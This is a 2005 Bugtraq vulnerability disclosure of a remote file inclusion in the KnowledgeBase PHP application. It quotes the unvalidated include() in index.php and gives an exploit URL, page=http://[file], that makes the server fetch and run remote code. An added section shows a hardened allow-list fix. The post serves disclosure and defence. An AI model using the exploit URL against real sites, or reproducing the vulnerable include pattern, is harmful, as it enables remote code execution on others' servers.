
List:       bugtraq
Subject:    KnowledgeBase
From:       Francisco Alisson <dominusvis () click21 ! com ! br>
Date:       2005-03-12 12:15:47
Message-ID: 20050312121547.31019.qmail () www ! securityfocus ! com



Remote File Inclusion

KnowledgeBase
Vendor: www.activecampaign.com/kb/

Well, inside the index.php file we can see:

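// $page is taken from the request (index.php?page=...) and is not validated
if ($page == "") {
    $page = "startup";
}
// the request-supplied value becomes the include path
@include("$page.php");
?>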

After I tested some sites with kb I got file inclusion:
http://www.site.com/kb/index.php?page=http://[file]

Dominus_Vis
[Infektion Group]
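
One way to close the inclusion described above, shown as an added example that is not part of the original post or the vendor's code. The names PAGE_DIR, ALLOWED_PAGES and resolve_page, and the page names other than "startup", are assumptions made for illustration.

```php
<?php
// Added example: hardened replacement for the include in index.php.
// PAGE_DIR and ALLOWED_PAGES are assumptions; list the application's real pages.
const PAGE_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['startup', 'article', 'search']; // hypothetical names

/**
 * Map a request-supplied page name to a local file path, or return null.
 */
function resolve_page($requested)
{
    // Arrays (?page[]=x) and empty values fall back to the default page.
    if (!is_string($requested) || $requested === '') {
        $requested = 'startup';
    }
    // Exact match against a fixed list: URLs, "../" and NUL bytes never match.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    // Defence in depth: the resolved file must exist and sit inside PAGE_DIR.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $requested . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Read the parameter explicitly instead of relying on a global $page.
$file = resolve_page(isset($_GET['page']) ? $_GET['page'] : null);
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $file; // no "@": include failures should reach the error log
```

Independently of the code change, keeping allow_url_include set to Off in php.ini (its default) stops include from fetching http:// or ftp:// URLs.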